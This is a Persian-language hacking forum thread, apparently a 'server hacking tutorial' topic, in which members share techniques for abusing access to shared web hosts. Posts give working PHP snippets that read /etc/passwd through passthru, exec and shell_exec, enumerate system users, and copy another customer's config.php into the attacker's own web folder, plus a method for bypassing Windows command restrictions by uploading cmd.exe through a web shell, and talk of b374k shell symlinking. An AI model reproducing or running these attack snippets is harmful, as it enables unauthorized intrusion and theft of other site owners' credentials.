توییت
RE: :: تاپیک آموزش سرور هکینگ ::
اموزش موجوده!
سرور پرشین گیگ از دسترس خارج شده!
اموزش موجوده!
سرور پرشین گیگ از دسترس خارج شده!
-
[align=center]وما توفيقي الا بالله -
RE: :: تاپیک آموزش سرور هکینگ ::
من یه فیلم سیملینک رکورد کردم برای دوستان مبتدی
سعی کردم تا جایی میتونم کامل توضیح بدم هرچند که همه سیملینکو بلدن
فیلم آموزش سیملینک تو انجمن زیاده اما خالی از لطف نیست منم یه فیلم بذارم
دوتا قسمته
قسمت اول:
واسه اینکه فیلم سیملینک تو انجمن زیاده تاپیک نزدم :Xکد:http://www.uplooder.net/cgi-bin/dl.cgi?key=7e5e9d66cc1842d8810cb3efdb1a057b http://www.uplooder.net/cgi-bin/dl.cgi?key=b9e13925aed9fc78de389349ca9edef8 http://www.uplooder.net/cgi-bin/dl.cgi?key=fe684544770e928c57588999c3377b2d
[align=center]روزگارم بر خلاف آرزوهایم گذشت...[/align]نظر
-
RE: :: تاپیک آموزش سرور هکینگ ::
بای پس Execute Command در سرور های ویندوز
همانطور که میدانید در بعضی مواقع ما اجازه استفاده از محیط command prompt بر روی سرور هدف نداریم ، به صورت پیشفرض وب شل برای اتصال به محیط دستوری از مسیر زیر پیروی میکند :
کد:C:\Windows\System32\cmd.exe
فرض کنید ما از یک سایت بر روی یک سرور ویندوز دسترسی اعمال کرده ایم ، حال نیاز داریم command هایی برای بای پس و ساخت یوزر و .... احرا کنیم اما سطح دسترسی مجاز برای دسترسی به شاخه ها و فایلها را نداریم . (administrator Group)
کافی هست بسته به نوع سیستم عامل ویندوز هدف (32 یا 64 بیتی بودن) cmd.exe نسخه ویندوز را آپلود کنید و از طریق web shell مسیر cmd آپلود شده را اجرا قرار دهیم که در ابتدا ما محدودیت اجرای دستور داریم در ادامه ما در یک دایرکتوری که دسترسی مجاز داشتیم cmd.exe مربوط به ورژن و نسخه همان سیستم عامل ویندوز را آپلود و مسیر را از فایل خودمان دنبال کردیم که نتیجه اجرای موفق دستورات میباشد .
امیدوارم استفاده کرده باشید / با تشکر[align=center]
[/align]نظر
-
RE: :: تاپیک آموزش سرور هکینگ ::
با سلام
یادی بشه از چندین سال پیش.
اینم اموزش سرور هکینگ از ایران هک وزرژن قبلی
http://amirio.persiangig.com/img3/Page1.jpg
فایلو دانلود فرمایید تا متون بهتر نمایش داده بشه.[align=center]وما توفيقي الا باللهنظر
-
RE: :: تاپیک آموزش سرور هکینگ ::
Bypass Passwd Methods
php script
Commandکد:echo passthru("cat /etc/passwd"); echo exec("cat /etc/passwd"); echo shell_exec("cat /etc/passwd");
php scriptکد:xxd /etc/passwd rev /etc/passwd tac /etc/passwd more /etc/passwd less /etc/passwd cat /etc/passwd
[hr]کد:<?php for($uid=0;$uid<60000;$uid++){ $ara = @posix_getpwuid($uid); if (!empty($ara)) { while (list ($key, $val) = each($ara)){ print "$val:"; } print "\n"; }}?>
اجرای دستور از طریق فانشن exec (در صورتی که در قسمت Disabled Functions ها محدود نشده باشد)
و اینم از طریق file_get_contentsکد:<?php echo exec('id'); ?>
[hr]کد:<?php echo file_get_contents('/etc/passwd'); ?>
در بعضی مواقع نمیتونیم دستور اجرا کنیم و نیاز به تغییر پریمیشن و یا ساخت فایل ، فولدر داریم من روش زیر را تست کردم و روی چندین سرور نتیجه گرفتم گفتم بد نیست بزارم :
کد:<?php chmod('cgi.pl ', 0755); mkdir('test', 0755, true); ?>[align=center]IRH WebScanner Tools V.1
|90%//////////////////////////////////////////|
[/align]نظر
-
PHP copy() code for Symlink
سلام به اساتید و دوستان عزیزم
در بعضی مواقع فانشن های اجرای دستور بسته شده و یا سرور به صورتی کانفیگ شده که شما از طریق محیط دستوری نمیتوانید سیمیلینک و یا خواندن فایل را انجام دهید ، من در چندین سرور این مشکل را داشتم و از طریق روش include php command تونستم سرور را بای پس کنم قرر میدهم تا عزیزان هم استفاده کنند .
فایلهای زیر را بصورت php ذخیره ، بر روی سرور هدف آپلود و اجرا نمایید .
کد اول که نیاز به باز بودن fopen داره
کد دوم :کد:<?php $source = '/home/targetuser/public_html/config.php'; $destination = '/home/myuser/public_html/irh.txt'; $data = file_get_contents($source); $handle = fopen($destination, "w"); fwrite($handle, $data); fclose($handle); ?>
و یا یک مسیر ثابت :کد:<?php echo copy("/etc/passwd","/home/myuser/public_html/irh.txt"); ?>
کد سوم با تعریف سطح دسترسی و ساخت فایل :کد:<?php echo copy("/home/targetuser/public_html/config.php","/home/myuser/public_html/irh.txt"); ?>
کد:<?php $srcfile='/home/targetuser/public_html/config.php'; $dstfile='/home/myuser/public_html/irh.txt'; mkdir(dirname($dstfile), 0777, true); copy($srcfile, $dstfile); ?>
[align=center]IRH WebScanner Tools V.1
|90%//////////////////////////////////////////|
[/align]نظر
-
RE: :: تاپیک آموزش سرور هکینگ ::
سلام ببخشید
میشه تاپیک رو آپ کنین ...
خیلی علاقه مندم به این بحث/ لینک دانلودم حذف شده
باش تشکرنظر
-
RE: :: تاپیک آموزش سرور هکینگ ::
لطفا اموزش سیملینک سرور رو با شل [align=right]b374k [/align] بزارین لینک دانلود اموزشای سیملینک حذف شدن لطفا این اموزشو قرار بدین با تشکر[img=18x18]images/smilies/Smileys/41.gif[/img]نظر
-
RE: :: تاپیک آموزش سرور هکینگ ::
سیملینک با اون شل خیلی راحت هست اگر دنبال منابع شل اسکریپت هستید من بزودی قرار میدم[align=center]
[/align]
[align=center]
[/align]نظر
-
RE: :: تاپیک آموزش سرور هکینگ ::
درود.نوشته اصلی توسط ehsan1377
دوست عزیز پیشنهاد میکنم قبل از اینکه که دنبال روش های Symlink با شل ها و اسکریپت های مختلف باشید، درک درستی از این عمل پیدا کنید.
سیملینک به معنای فراخوانی یک فایل یا یک دایرکتوری در سرور هست.
خب حالا روش های فراوانی برای این کار وجود داره.
مثلا سیملینک با اجرای فایل ln در مسیر bin/ .
یا سیملینک توسط php و perl .
شما اگر از پایه این ها رو یاد بگیرید دیگه وابستگی به اینجور ابزارها نخواهید داشت.
موفق باشید...
[align=center]مشاجره، نادانی انسان را آشکار می کند و چیزی به مطلب حق او نمی افزاید. امام علی (ع)
همانا ارزشمند ترين بی نيازی عقل، بزرگ ترين فقر بی خردی، ترسناك ترين تنهايی خود پسندی و گرامی ترين ارزش خانوادگی، اخلاق نيكوست. امام علی (ع)[/align]
نظر
-
Symlink With Cpanel CronJobs
با اجازه اساتید ادامه این تاپیک بنده هم چند روش قرار میدهم /.
سیمیلینک از طریق Cron Jobs سی پنل[align=left] [/align] [align=center]
[/align]
نظر
نظر